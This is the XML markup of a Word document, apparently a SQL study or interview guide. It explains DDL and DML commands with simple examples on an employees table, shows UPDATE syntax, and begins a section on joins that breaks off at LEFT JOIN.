          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DML (Data Manipulation Language)</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are two subsets of SQL commands that serve different purposes in the management and manipulation of databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A3F388" w14:textId="77777777" w:rsidR="00EF05F0" w:rsidRPr="00393B05" w:rsidRDefault="00EF05F0"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1. DDL (Data Definition Language)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC252AB"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DDL commands are used to define, modify, and manage the structure (schema) of database objects like tables, views, indexes, etc. These commands do not manipulate the actual data inside the tables but affect the structure and organization of the database itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EA2EAF" w14:textId="77777777" w:rsidR="00EF05F0" w:rsidRPr="00393B05" w:rsidRDefault="00EF05F0"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Common DDL Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740DB644"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CREATE</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to create new database objects such as tables, indexes, views, or schemas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D164A2F" w14:textId="77777777" w:rsidR="00EF05F0" w:rsidRPr="00393B05" w:rsidRDefault="00EF05F0"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Example: CREATE TABLE employees (id INT, name VARCHAR(50));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B28D419"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ALTER</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to modify an existing database object, like adding/removing columns in a table or changing the data type of a column.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185DB9EC" w14:textId="77777777" w:rsidR="00EF05F0" w:rsidRPr="00393B05" w:rsidRDefault="00EF05F0"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Example: ALTER TABLE employees ADD email VARCHAR(100);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB24981"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ROP</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to delete an existing database object like a table, view, or index.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BAD198" w14:textId="77777777" w:rsidR="00EF05F0" w:rsidRPr="00393B05" w:rsidRDefault="00EF05F0"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Example: DROP TABLE employees;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3207BE76"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TRUNCATE</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to remove all data from a table but keeps the table structure intact for future use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2293A6" w14:textId="77777777" w:rsidR="00EF05F0" w:rsidRPr="00393B05" w:rsidRDefault="00EF05F0"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Example: TRUNCATE TABLE employees;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F873EE4"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RENAME</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to rename a database object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428486C5" w14:textId="77777777" w:rsidR="00EF05F0" w:rsidRPr="00393B05" w:rsidRDefault="00EF05F0"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Example: RENAME employees TO staff;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71331A84" w14:textId="77777777" w:rsidR="00EF05F0" w:rsidRPr="00393B05" w:rsidRDefault="00EF05F0"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2. DML (Data Manipulation Language)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508D29D2"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DML commands are used to manipulate the actual data within the tables. They allow you to retrieve, insert, update, or delete data in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA0BC12" w14:textId="77777777" w:rsidR="00EF05F0" w:rsidRPr="00393B05" w:rsidRDefault="00EF05F0"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Common DML Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5BCB1E"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SELECT</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to query data from one or more tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358C09CD" w14:textId="77777777" w:rsidR="00EF05F0" w:rsidRPr="00393B05" w:rsidRDefault="00EF05F0"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Example: SELECT * FROM employees WHERE department = 'HR';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5860D763"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INSERT</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to insert new rows of data into a table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1633C99C" w14:textId="77777777" w:rsidR="00EF05F0" w:rsidRPr="00393B05" w:rsidRDefault="00EF05F0"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Example: INSERT INTO employees (id, name, department) VALUES (1, 'John Doe', 'HR');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCA1493"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UPDATE</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to modify existing data in a table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7284405D" w14:textId="77777777" w:rsidR="00EF05F0" w:rsidRPr="00393B05" w:rsidRDefault="00EF05F0"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Example: UPDATE employees SET department = 'IT' WHERE id = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A61E61"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ELETE</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to remove data from a table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE84CF9" w14:textId="77777777" w:rsidR="00EF05F0" w:rsidRPr="00393B05" w:rsidRDefault="00EF05F0"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Example: DELETE FROM employees WHERE id = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DDCF37" w14:textId="77777777" w:rsidR="00EF05F0" w:rsidRPr="00393B05" w:rsidRDefault="00EF05F0"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6"/>
        <w:gridCol w:w="5637"/>
        <w:gridCol w:w="3051"/>
      </w:tblGrid>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="376FE3A8" w14:textId="77777777" w:rsidTr="00EF05F0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F6333E4" w14:textId="77777777" w:rsidR="00EF05F0" w:rsidRPr="00393B05" w:rsidRDefault="00EF05F0"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Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5BCA9389" w14:textId="77777777" w:rsidR="00EF05F0" w:rsidRPr="00393B05" w:rsidRDefault="00EF05F0"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DDL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="058AC338" w14:textId="77777777" w:rsidR="00EF05F0" w:rsidRPr="00393B05" w:rsidRDefault="00EF05F0"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DML</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="036F6C2B" w14:textId="77777777" w:rsidTr="00EF05F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A7D733B"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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19BA780D"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Defines or modifies database objects</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="219C477E"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Manipulates data in the tables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="03E1669F" w14:textId="77777777" w:rsidTr="00EF05F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6495545B"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Examples</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FD223BD"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CREATE, ALTER, DROP, RENAME, TRUNCATE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BB1ED17"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ELECT, INSERT, UPDATE, DELETE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="683F069A" w14:textId="77777777" w:rsidTr="00EF05F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="792A9E60"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Affects</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="730AC70D"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tructure of the database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F83396D"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Data within the database</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="2161CE9A" w14:textId="77777777" w:rsidTr="00EF05F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54ED3376"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Execution Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2ADC16D3"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Changes are permanent and cannot be rolled back (except for TRUNCATE which is often non-reversible)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58647823"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Changes can be rolled back with a transaction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00393B05" w:rsidRPr="00393B05" w14:paraId="39CFEF98" w14:textId="77777777" w:rsidTr="00EF05F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="403FB566"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Transaction Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="671EE085"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No need for transaction control (except TRUNCATE sometimes)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26983FAF"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Needs transaction control (commit/rollback)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="79277DF2"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In summary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B17A40C"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DL</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> commands deal with the structure and schema of the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FD595E" w14:textId="77777777" w:rsidR="00EF05F0" w:rsidRPr="00393B05" w:rsidRDefault="00EF05F0"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ML</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> commands deal with the actual data inside the tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7003364C" w14:textId="7F81CEA1" w:rsidR="0025066D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0025066D">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CB53A13">
          <v:rect id="_x0000_i2966" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9ADB50" w14:textId="6CC77FF0" w:rsidR="004A5A54" w:rsidRPr="00CE4B95" w:rsidRDefault="002C0B92">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="707" w:name="_Toc196308187"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SQL Q</w:t>
      </w:r>
      <w:r w:rsidR="004A5A54" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">uery </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>- T</w:t>
      </w:r>
      <w:r w:rsidR="004A5A54" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>o update data in the table?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="707"/>
    </w:p>
    <w:p w14:paraId="75A31276" w14:textId="2B61FAC4" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92" w:rsidP="003B4E96">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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To update data in a table, you can use the UPDATE statement in SQL. The general syntax for updating data in a table is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C08351A" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92" w:rsidP="002C0B92">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UPDATE table_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E9E037" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92" w:rsidP="002C0B92">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ET column1 = value1, column2 = value2, ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744B798A" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92" w:rsidP="002C0B92">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WHERE condition;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E82A1FD" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92" w:rsidP="002C0B92">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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448D2E51" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92" w:rsidP="002C0B92">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uppose you have an employees table with columns id, name, and department. If you want to update the department of an employee with id = 1 to "IT", the query would be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7736B73C" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92" w:rsidP="002C0B92">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UPDATE employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09206286" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92" w:rsidP="002C0B92">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ET department = 'IT'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A706D8C" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92" w:rsidP="002C0B92">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WHERE id = 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0627568D" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92" w:rsidP="002C0B92">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Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3005AA" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92" w:rsidP="002C0B92">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UPDATE employees</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Specifies the table (employees) that you want to update.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03560535" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92" w:rsidP="002C0B92">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SET department = 'IT'</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Specifies the column (department) you want to update and the new value ('IT').</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16126972" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92" w:rsidP="002C0B92">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WHERE id = 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: The WHERE clause is crucial because it determines which record(s) will be updated. If you omit the WHERE clause, </w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>all rows</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the table will be updated.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B63EDD0" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92" w:rsidP="002C0B92">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Important Notes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A735A2" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92" w:rsidP="002C0B92">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Always use the WHERE clause to specify which record(s) to update. Without it, all rows in the table will be updated with the new values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C13EFF" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92" w:rsidP="002C0B92">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You can update multiple columns in one statement by separating each column-value pair with commas (as shown in the example above).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6051B8C1" w14:textId="562EE5CD" w:rsidR="0025066D" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0025066D">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673DE95">
          <v:rect id="_x0000_i2967" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDBE4DB" w14:textId="0EF78158" w:rsidR="004A5A54" w:rsidRPr="00CE4B95" w:rsidRDefault="009D2006">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="708" w:name="_Toc196308188"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of joins in the database</w:t>
      </w:r>
      <w:r w:rsidR="004A5A54" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="708"/>
    </w:p>
    <w:p w14:paraId="3453431A" w14:textId="2F9F8A12" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92" w:rsidP="00393B05">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Joins</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in databases are used to combine rows from two or more tables based on a related column between them. The primary purpose of using joins is to retrieve data that is spread across multiple tables in a relational database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79421203"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Types of Joins:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B9E78F"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INNER JOIN</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F55D7F" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92"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Retrieves only the rows that have matching values in both tables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6410B769" w14:textId="77777777" w:rsidR="002C0B92" w:rsidRPr="00393B05" w:rsidRDefault="002C0B92"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If there is no match, the row is excluded from the result set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70593505"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ample</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29540704"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ELECT e.employee_name, d.department_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179DE438"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FROM employees e</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4901ED"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INNER JOIN departments d ON e.department_id = d.department_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDBA2CF"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LEFT JOIN (or LEFT OUTER JOIN)</w:t>
      </w:r>
      <w:r w:rsidRPr="00393B05">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
